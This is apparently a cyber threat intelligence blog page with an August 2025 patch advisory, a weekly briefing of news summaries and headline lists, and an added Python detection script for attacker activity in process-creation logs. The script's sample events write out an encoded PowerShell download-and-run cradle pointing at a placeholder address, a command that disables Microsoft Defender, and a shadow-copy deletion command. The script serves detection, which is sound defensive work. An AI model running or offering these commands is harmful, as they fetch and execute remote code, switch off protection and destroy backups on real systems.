Threat Intelligence Blog
Black Arrow Cyber Advisory - 13 August 2025 - Security Updates from Microsoft, Adobe, SAP, Fortinet and Ivanti
Executive Summary
August’s Patch Tuesday delivers substantial updates across enterprise platforms. Microsoft addresses 107 vulnerabilities—including one zero-day and 13 critical flaws—spanning Windows, Office, and server products. Adobe issues multiple bulletins for Commerce, InCopy, and FrameMaker. SAP releases 15 Security Notes for enterprise systems. Fortinet publishes critical advisories for Security Fabric, FGFM, and SSL-VPN components. Ivanti provides three updates for its secure gateway products. Immediate patching is advised, particularly for critical RCE and privilege-escalation vulnerabilities.
Vulnerabilities by Vendor
Microsoft[¹]: 107 vulnerabilities addressed, including one publicly disclosed zero-day and 13 critical flaws. Patching is advised across Windows, Office, SQL Server, and other widespread components.
Adobe[²]: At least 19 vulnerabilities in Adobe Commerce, InCopy, and FrameMaker. Focus should be on critical arbitrary code execution fixes.
SAP[³]: 15 Security Notes affecting S/4HANA, Business Suite, and other SAP platforms. HotNews and high-priority advisories should be applied first.
Fortinet[⁴]: Three advisories dated 12 August 2025—covering Security Fabric privilege issues, FGFM authentication weaknesses (in FortiOS/FortiProxy/FortiPAM), and an SSL-VPN integer-overflow DoS vulnerability.
Ivanti[⁵]: Three product-specific advisories on August Patch Tuesday — for Connect Secure, Policy Secure, and ZTA Gateways — focused on gateway access and authentication security.
What’s the risk to me or my business?
The presence of a publicly disclosed zero-day alongside critical RCE and privilege-escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise. Edge devices such as VPN gateways and secure access products are routinely targeted within days of a fix being released, so the Fortinet and Ivanti updates deserve the same urgency as the Microsoft patches.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation’s security policies and ensure that all systems are running supported and up-to-date software versions.
Footnotes:
¹ Microsoft — August 2025 Security Update Release Notes: https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug
² Adobe — Adobe Product Security Bulletin: https://helpx.adobe.com/security/security-bulletin.html
³ SAP — SAP Security Patch Day August 2025: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html
⁴ Fortinet Security Advisories: https://www.fortiguard.com/psirt
⁵ Ivanti August 2025 Security Advisory: https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-Multiple-CVEs?language=en_US
Black Arrow Cyber Threat Intelligence Briefing 08 August 2025:
-AI Can Plan and Execute Cyber Attacks Without Human Intervention
-Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities
-Hackers Use Social Engineering Attack to Gain Remote Access in 5 Minutes
-Social Engineering Attacks Surged This Past Year
-Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration
-Cyber Criminals Are Getting Personal, and It’s Working
-Ransomware Victims Are Still Paying Up, Some More Than Once
-SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats
-Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe
-Exposed Without a Breach - The Cost of Data Blindness
-Cyber Insurance Premiums Are Soaring — And So Are Your Risks
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, we start with insights into the evolving tactics of attackers. A study has shown how AI can plan and execute complex cyber attacks without human intervention, while other attackers are using stolen credentials and vulnerabilities to gain access to managed service providers. Social engineering attacks have surged over the past year, with attackers able to access their target’s corporate systems within 5 minutes. Once they are in, the attackers are expanding their tactics beyond encryption and exfiltration, and victims continue to pay the ransom demands.
We also report that the UK is the third most targeted country globally, behind the US and Canada, and we highlight the challenges facing small and medium sized businesses in particular. We also highlight that cyber incidents do not only happen as part of an attack; they also occur when data is exposed through mismanaged systems and access rights. As all these risks increase, we also highlight the potential value of cyber insurance as part of a robust and planned cyber security strategy.
Top Cyber Stories of the Last Week
AI Can Plan and Execute Cyber Attacks Without Human Intervention
A recent study from Carnegie Mellon University, in collaboration with Anthropic, has demonstrated how far AI capabilities in offensive cyber operations have advanced. The research showed that large language models (LLMs) can autonomously plan and execute complex cyber attacks, such as replicating the 2017 Equifax breach, without any human intervention. The AI functioned as the planner, delegating tasks to sub-agents, and managed to deploy malware and extract data. While this work was conducted in a controlled environment, it raises significant concerns about the potential for AI-driven cyber attacks. These developments signal a shift towards more autonomous and adaptive threats.
Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities
Ransomware groups Akira and Lynx are increasingly targeting managed service providers (MSPs) and small businesses, exploiting stolen credentials and vulnerabilities. These groups have compromised over 365 organisations, with Akira evolving into one of the top 10 ransomware operations, focusing on MSPs to access extensive client networks. Both groups utilise techniques such as credential-based attacks, file encryption, and data theft, to extort ransoms. They share similarities with the notorious Conti ransomware, indicating potential code reuse. The attacks also involve evasion tactics such as disabling security software and targeting backup systems to ensure successful encryption.
https://cybersecuritynews.com/akira-and-lynx-ransomware/
Hackers Use Social Engineering Attack to Gain Remote Access in 5 Minutes
A recent cyber attack investigation demonstrated how threat actors compromised corporate systems in under five minutes using social engineering and trusted business tools. The attackers impersonated IT support to gain remote access via Microsoft Quick Assist, then deployed malicious PowerShell scripts to install a remote access tool and harvest credentials. The attack, which leveraged legitimate Windows tools, highlights the growing risk of social engineering tactics in bypassing security controls. The incident underscores the need for improved user training and prompt incident response to mitigate the impact of such rapid breaches.
https://cybersecuritynews.com/hacked-in-300-seconds/
Social Engineering Attacks Surged This Past Year
Palo Alto Networks’ latest report reveals that social engineering has become the leading initial access method for cyber attacks over the past year, with 36% of incident response cases traced back to this tactic. These attacks, used by a variety of groups, including financially motivated cyber criminals and nation-state operatives, often target employees with system-wide access, such as help desk staff and administrators. Social engineering is particularly effective in compromising sensitive data, with 60% of such attacks leading to data exposure. The report highlights that these attacks have spiked in frequency, especially from groups like Scattered Spider and North Korean operatives.
https://cyberscoop.com/social-engineering-top-attack-vector-unit-42/
Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration
A recent Barracuda report reveals that ransomware actors have expanded their tactics beyond data encryption and exfiltration. Other common activities included wiping backups or deleting shadow copies of files (37%), installing additional malware or payloads (29%), infecting multiple endpoints such as computers or servers (26%), and threatening partners, shareholders, or customers (22%). Attackers also threatened to alert the authorities or the press (21%) and even threatened staff (16%). Only a quarter (24%) of incidents involved data encryption. Data was stolen and either leaked or retained in 54% of cases. These multidimensional tactics increase pressure on victims to pay.
https://www.infosecurity-magazine.com/news/ransomware-expand-encryption/
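The Quick Assist intrusion and the Barracuda findings above describe behaviours that leave clear traces in endpoint process-creation telemetry: a shell launched from a remote-assistance tool, an encoded PowerShell download cradle, security tooling being switched off (as in the Akira and Lynx campaigns against MSPs), and shadow copies being wiped ahead of encryption. The following is an added example written for this briefing, not code from the original page or from any of the reports it cites. It runs those detections over Sysmon Event ID 1 style records that are constructed inline; the hostnames, user names, file paths and the address 198.51.100.7 are invented, and the encoded payload is built by the sample itself.

```python
"""Process-creation detections for the tradecraft described above.

Added example for this briefing; the events below are constructed, not real
telemetry, and every host, user, path and address in them is invented.
"""
from __future__ import annotations

import base64
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


# Remote-assistance binaries a fake "IT support" caller asks the victim to start.
REMOTE_ASSIST_TOOLS = {"quickassist.exe", "anydesk.exe", "teamviewer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I)
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\b.*-Disable(?:RealtimeMonitoring|IOAVProtection|BehaviorMonitoring)", re.I)
BACKUP_WIPE = re.compile(
    r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete"
    r"|wbadmin(?:\.exe)?\s+delete\s+catalog|bcdedit(?:\.exe)?\b.*recoveryenabled\s+no", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE script text; return the script or '' if undecodable."""
    try:
        return base64.b64decode(b64).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def evaluate(event: ProcEvent) -> list[tuple[str, str]]:
    """Return (stage, finding) pairs for one process-creation event."""
    hits: list[tuple[str, str]] = []
    image, parent = basename(event.image), basename(event.parent_image)

    if parent in REMOTE_ASSIST_TOOLS and image in SHELLS:
        hits.append(("initial_access", f"{image} spawned by remote-assistance tool {parent}"))

    if image in POWERSHELL:
        effective = event.command_line          # raw command line plus any decoded -enc payload
        m = ENCODED_PS.search(event.command_line)
        if m:
            hits.append(("execution", "encoded PowerShell command"))
            effective += " " + decode_encoded_command(m.group(1))
        if DOWNLOAD_CRADLE.search(effective):
            hits.append(("execution", "PowerShell download cradle"))
        if DEFENDER_TAMPER.search(effective):
            hits.append(("defence_evasion", "Microsoft Defender protection disabled via Set-MpPreference"))

    if BACKUP_WIPE.search(event.command_line):
        hits.append(("impact", "shadow copy / backup catalogue deletion"))
    return hits


def triage(events) -> dict[str, dict]:
    """Per host: findings plus a severity that rises when more than one kill-chain stage is seen."""
    per_host: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for ev in events:
        hits = evaluate(ev)
        if hits:
            per_host[ev.host].extend(hits)
    report = {}
    for host, hits in per_host.items():
        stages = {stage for stage, _ in hits}
        report[host] = {
            "severity": "critical" if len(stages) >= 2 else "high",
            "stages": sorted(stages),
            "findings": [finding for _, finding in hits],
        }
    return report


# Constructed sample telemetry (not real logs); 198.51.100.7 is a documentation address.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
QUICK_ASSIST = r"C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_2.0\QuickAssist.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcEvent("WS01", r"CORP\jdoe", PS, QUICK_ASSIST, f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"),
    ProcEvent("WS01", r"CORP\jdoe", PS, PS, 'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcEvent("SRV-FS01", r"CORP\jdoe", r"C:\Windows\System32\vssadmin.exe", r"C:\Windows\System32\cmd.exe",
              "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("WS02", r"CORP\asmith", PS, r"C:\Windows\explorer.exe", r"powershell.exe -NoProfile -File C:\Scripts\Get-Inventory.ps1"),
]

if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {entry['severity']} {entry['stages']}")
        for finding in entry["findings"]:
            print(f"  - {finding}")
```

The point of decoding the `-enc` payload before matching is that the cradle is invisible in the raw command line; a rule that only inspects the visible arguments would fire on "encoded PowerShell" alone and miss the download. The per-host severity step is what turns single findings into a story: a workstation showing initial access, execution and defence evasion together is a live intrusion, whereas a lone shadow-copy deletion on a file server may still be a legitimate maintenance task and needs confirming.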
Cyber Criminals Are Getting Personal, and It’s Working
Cyber criminals are increasingly personalising their attacks, with phishing kits becoming harder to detect and reverse-engineer. A key tactic involves using custom-made kits, driven by AI, to scale campaigns. Email-based attacks continue to rise, with business email compromise (BEC) becoming a prominent threat. Lumma Stealer malware is the most prevalent, often delivered through common file attachments or cloud services. Financial lures and urgency-based messages remain the top tactics used to trick victims, with cyber criminals employing sophisticated methods to bypass detection. The growing use of AI is enabling more targeted and scalable phishing efforts.
https://www.helpnetsecurity.com/2025/08/07/email-attacks-q2-2025/
Ransomware Victims Are Still Paying Up, Some More Than Once
A recent report from Semperis reveals that ransomware attacks remain a significant threat, with 81% of US firms and 78% globally targeted in the past year. Attackers succeed in over half of cases, and many companies pay ransoms multiple times. The majority of payments range between $500,000 and $1 million, but some companies face repeated attacks. The report highlights the growing risk of identity infrastructure breaches, including Active Directory and Okta, which enable attackers to persist and escalate their reach. Organisations are urged to automate defences, secure identity systems, and prepare comprehensive ransomware-response plans.
SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats
TrustLayer’s 2025 UK Cyber Resilience Report reveals a growing challenge for UK SMBs in managing cyber security. With shrinking budgets and rising alert volumes, organisations struggle to protect against email, cloud, and insider threats. The report highlights critical gaps, including limited cloud visibility, outdated security tools, and insider risks, with nearly one in three data breaches originating from employees. Additionally, alert overload is leading to stress and burnout in security teams. TrustLayer recommends streamlining security tools, automating processes, and focusing on human-centric operations to build a more resilient, efficient cyber security strategy.
Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe
The UK has seen a significant rise in cyber attacks, making it the third most targeted country globally, behind the US and Canada. According to a NordVPN report, there has been a 7% increase in malware incidents, totalling 103 million, with the UK having the highest malware concentration per user in Europe. Cyber criminals often use trusted brands like Google, Amazon, and Yahoo to deceive users into exposing sensitive data. Malware now includes a wide range of threats, from data theft to device hijacking. The rise in online scams and increasingly sophisticated techniques highlights growing cyber security risks for UK businesses and consumers.
Exposed Without a Breach - The Cost of Data Blindness
Data blindness, where sensitive information is exposed without traditional cyber attack methods, poses a significant risk to organisations. This occurs when misconfigured systems, overpermissioned users, and unmonitored data flows leave critical data vulnerable. Traditional tools fail to account for modern data environments, where information is scattered across cloud platforms, third-party services, and AI-generated content. As a result, visibility gaps lead to unnoticed breaches, with the consequences often as severe as a traditional cyber attack. To mitigate this, organisations must adopt continuous, real-time data visibility, ensuring sensitive data is always monitored and aligned with business context.
https://securityaffairs.com/180813/security/exposed-without-a-breach-the-cost-of-data-blindness.html
Cyber Insurance Premiums Are Soaring — And So Are Your Risks
The global cyber insurance market is set to grow rapidly, doubling by 2030, driven by rising cyber risks such as ransomware and stringent regulatory requirements like GDPR and NIS2. As cyber attacks become more frequent and costly, businesses are increasingly relying on insurance as a safety net. Insurers are adjusting by incorporating real-time threat intelligence to price policies more accurately. Firms should consider the appropriateness of their cyber insurance to protect client data and manage cyber risks effectively. It is critical for firms to review their policies and ensure adequate coverage.
https://abovethelaw.com/2025/08/cyber-insurance-premiums-are-soaring-and-so-are-your-risks/
Governance, Risk and Compliance
CISOs say they're prepared, their data says otherwise - Help Net Security
Why 90% of cyber leaders are feeling the heat - Help Net Security
Cybersecurity must be a top priority for businesses from beginning to end | TechRadar
Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online
75 percent of cybersecurity leaders don’t trust their own data - BetaNews
The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
Summer: Why cybersecurity must be strengthened as vacations abound | CSO Online
Cybersecurity Incident Response Needs A War Room, Not A Playbook
Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats
Threats
Ransomware, Extortion and Destructive Attacks
Nearly one-third of ransomware victims are hit multiple times, even after paying hackers | IT Pro
New EDR killer tool used by eight different ransomware groups
Ransomware groups shift to quadruple extortion to maximize pressure - Help Net Security
75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration - Infosecurity Magazine
On the Rise: Ransomware Victims, Breaches, Infostealers
This devious ransomware is able to hijack your system to turn off Microsoft Defender | TechRadar
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Ransomware Surges as Attempts Spike 146%
Nimble 'Gunra' Ransomware Evolves With Linux Variant
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
Ransomware gangs join attacks targeting Microsoft SharePoint servers
Study: 78% of Companies Targeted with Ransomware
Ransomware-as-a-Service Economy - Trends, Targets & Takedowns
Ransomware attacks: The evolving extortion threat to US financial institutions | CSO Online
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Royal and BlackSuit ransomware gangs hit over 450 US companies
Qilin Ransomware Affiliate Panel Login Credentials Exposed Online – DataBreaches.Net
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Countering the Threat of Ransomware as a Service
Why we shouldn’t just repeat ransomware groups’ claims, Sunday edition – DataBreaches.Net
Authorities seize BlackSuit ransomware gang's servers | TechCrunch
Ransomware Victims
Ransomware attacks cripple government services across Dutch Caribbean islands | NL Times
Ransomware plunges insurance company into bankruptcy | Fortra
SBM investigates alleged cyber incident amid claims of reputational threat - NEWS.MC - Monaco News
Phishing & Email Based Attacks
Cybercriminals are getting personal, and it's working - Help Net Security
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Phishers Abuse M365 'Direct Send' to Spoof Internal Users
Mozilla warns Firefox add-on devs of new phishing attacks • The Register
Other Social Engineering
Cybercriminals are getting personal, and it's working - Help Net Security
Social engineering attacks surged this past year, Palo Alto Networks report finds | CyberScoop
Hackers Use Social Engineering Attack to Gain Remote Access in 300 Seconds
Gen Z in the Crosshairs: Cybercriminals Shift Focus to Young, Digital-Savvy Workers - SecurityWeek
QR Code Quishing Attacks Surge 50%: Protect Against Data Theft
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Cisco Victim of Voice Phishing Attack, Customer Data Stolen
How not to hire a North Korean IT spy | CSO Online
Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.
Fraud, Scams and Financial Crime
Experts Alarmed by UK Government’s Companies House ID Checks - Infosecurity Magazine
Scammers abusing WhatsApp group invites | Cybernews
Fraud controls don’t guarantee consumer trust - Help Net Security
Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.
AI Fuels Record Number of Fraud Cases - Infosecurity Magazine
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Artificial Intelligence
9 things you shouldn't use AI for at work | ZDNET
Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security
CrowdStrike: Threat Actors Increasingly Lean on AI Tools
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Russian Cyber Threat Group Uses AI-Guided Malware
Financial sector faced most AI-powered cyberattacks: survey
Rising Mobile Browser Attacks: AI Threats and Key Defenses
AI Guardrails Under Fire: Cisco's Jailbreak Demo Exposes AI Weak Points - SecurityWeek
Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern
AI can write your code, but nearly half of it may be insecure - Help Net Security
Security Researchers Just Hacked ChatGPT Using A Single 'Poisoned' Document
AI Fuels Record Number of Fraud Cases - Infosecurity Magazine
Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek
NIST seeks to avoid reinventing the wheel with AI security guidance
Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats
What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security
42% of Developers Using AI Say Their Codebase is Now Mostly AI-Generated
Anthropic wants to stop AI models from turning evil - here's how | ZDNET
Claude Vulnerabilities Let Attackers Execute Unauthorized Commands With its Own Help
Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes
Malware
On the Rise: Ransomware Victims, Breaches, Infostealers
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Russian Cyber Threat Group Uses AI-Guided Malware
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine
New 'Shade BIOS' Technique Beats Every Kind of Security
New Undetectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access
Antivirus vendors fail to spot persistent Linux backdoor • The Register
Python-powered malware grabs 200K passwords, credit cards • The Register
CISA releases malware analysis for SharePoint Server attack • The Register
Fake WhatsApp developer libraries hide destructive data-wiping code
Wave of 150 crypto-draining extensions hits Firefox add-on store
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Mobile
Rising Mobile Browser Attacks: AI Threats and Key Defenses
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
Google addresses six vulnerabilities in August’s Android security update | CyberScoop
PlayPraetor Android RAT expands rapidly across Spanish and French-speaking regions
France orders officials to drop foreign messaging apps over cybersecurity fears
Internet of Things – IoT
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern
The humble printer highlights overlooked security flaws | CIO Dive
Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes
Data Breaches/Leaks
On the Rise: Ransomware Victims, Breaches, Infostealers
Legal aid cyber-attack has pushed sector towards collapse, say lawyers | Legal aid | The Guardian
Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch
Exposed Without a Breach: The Cost of Data Blindness
Cisco Victim of Voice Phishing Attack, Customer Data Stolen
Top MoD civil servant to leave in wake of Afghan data breach - BBC News
Average global data breach cost now $4.44 million - Help Net Security
Swipe Right for a Cyberattack: Dating Sites, EV Chargers, and Sex Toys
No, 16 Billion New User Credentials Weren’t Leaked—but the Risk Remains | Proofpoint US
Allianz faces fresh lawsuit as cyberattack exposes 1.4 million records | Insurance Business America
Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records - Infosecurity Magazine
Air France and KLM disclosed data breaches following the hack of a third-party platform
Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week
Pandora confirms data breach amid ongoing Salesforce data theft attacks
Allianz Life cyberattack gets worse as company confirms Social Security numbers stolen | TechRadar
Lovense flaws expose emails and allow account takeover
PBS confirms data breach after employee info leaked on Discord servers
Despite data breaches like the Tea app, companies see little consequence - The Washington Post
Florida prison exposes visitor contact info to every inmate • The Register
Organised Crime & Criminal Actors
Cybercriminals are getting personal, and it's working - Help Net Security
Why the Old Ways Are Still the Best for Most Cybercriminals
From fake CAPTCHAs to RATs: Inside 2025's cyber deception threat trends - Help Net Security
Python-powered malware grabs 200K passwords, credit cards • The Register
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Countering the Threat of Ransomware as a Service
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Wave of 150 crypto-draining extensions hits Firefox add-on store
Insider Risk and Insider Threats
Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
Laptop Farm: What It Is & How It's Used, Explained
How not to hire a North Korean IT spy | CSO Online
Insurance
Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law
Supply Chain and Third Parties
Air France and KLM disclosed data breaches following the hack of a third-party platform
Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week
Pandora confirms data breach amid ongoing Salesforce data theft attacks
Cloud/SaaS
Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Phishers Abuse M365 'Direct Send' to Spoof Internal Users
How the UK's cloud strategy was hijacked by a hyperscaler duopoly | Computer Weekly
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk - Infosecurity Magazine
Identity and Access Management
Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking
Encryption
Encryption Made for Police and Military Radios May Be Easily Cracked | WIRED
Linux and Open Source
New Linux backdoor Plague bypasses auth via malicious PAM module
New Undetectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access
Antivirus vendors fail to spot persistent Linux backdoor • The Register
New malware avoids antivirus detection, unleashes a "plague" on your devices | TechRadar
Nimble 'Gunra' Ransomware Evolves With Linux Variant
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Lansweeper finds Linux is growing on business endpoints • The Register
Yes, you need a firewall on Linux - here's why and which to use | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Python-powered malware grabs 200K passwords, credit cards • The Register
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine
Hackers Steal 1.8 Billion Credentials, 9 Billion Data Records
Social Media
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Amnesty slams X for 'central role' in fueling UK violence • The Register
Instagram lets you see your friends' locations now, and vice versa - here's how | ZDNET
Malvertising
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Regulations, Fines and Legislation
Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra
75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro
The VPNs allowing youngsters to bypass UK age verification rules
One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru
'Can I see some ID?' As online age verification spreads, so do privacy concerns | CBC News
The Cyber Security and Resilience Bill | Technology Law Dispatch
CISA, USCG make example out of organization they audited • The Register
Former and current officials clash over CISA’s role in US cyber defenses at Black Hat - Nextgov/FCW
Senate confirms national cyber director pick Sean Cairncross | CyberScoop
Annual ODPA report highlights local Data Law adequacy - Bailiwick Express News Guernsey
Illumina Settles Allegations of Cyber Vulnerabilities in Genomic Sequencing for $9.8M
America Is Blinding Itself - by Mark Hertling - The Bulwark
US Agencies Fail IT Security Audits, Jeopardizing National Security
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Models, Frameworks and Standards
Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra
The Cyber Security and Resilience Bill | Technology Law Dispatch
NIST seeks to avoid reinventing the wheel with AI security guidance
NCSC Updates Cyber Assessment Framework to Build UK CNI Resilience - Infosecurity Magazine
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Careers, Working in Cyber and Information Security
How CISOs are training the next generation of cyber leaders | CSO Online
The Five Steps to Increase UK Cyber Resilience Detailed | SC Media UK
5 hard truths of a career in cybersecurity — and how to navigate them | CSO Online
Law Enforcement Action and Take Downs
Details emerge on BlackSuit ransomware takedown | CyberScoop
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
NATO condemns Russian cyber activities
Europe must adapt to Russia's hybrid cyber war
Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
Nation State Actors
China
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
China’s botched Great Firewall upgrade invites attacks • The Register
Chinese Nation-State Hackers Breach Southeast Asian Telecoms
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
Why an explosive fight erupted over the UK's new Chinese embassy - BBC News
Chinese cyberattack on US nuclear agency highlights importance of cyber hygiene | The Strategist
Nvidia says its chips have no 'backdoors' after China raises concerns | Fox Business
China Says US Exploited Old Microsoft Flaw for Cyberattacks - Bloomberg
Russia
NATO condemns Russian cyber activities
Europe must adapt to Russia's hybrid cyber war
Russian Cyber Threat Group Uses AI-Guided Malware
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Ukrainian drone attacks are causing blackouts and shutdowns for Russian mobile internet | TechRadar
Iran
Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop
North Korea
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
Laptop Farm: What It Is & How It's Used, Explained
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Tools and Controls
Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law
AI can write your code, but nearly half of it may be insecure - Help Net Security
New EDR killer tool used by eight different ransomware groups
75 percent of cybersecurity leaders don’t trust their own data - BetaNews
One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru
Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Exposed Without a Breach: The Cost of Data Blindness
The humble printer highlights overlooked security flaws | CIO Dive
What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security
Fraud controls don’t guarantee consumer trust - Help Net Security
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
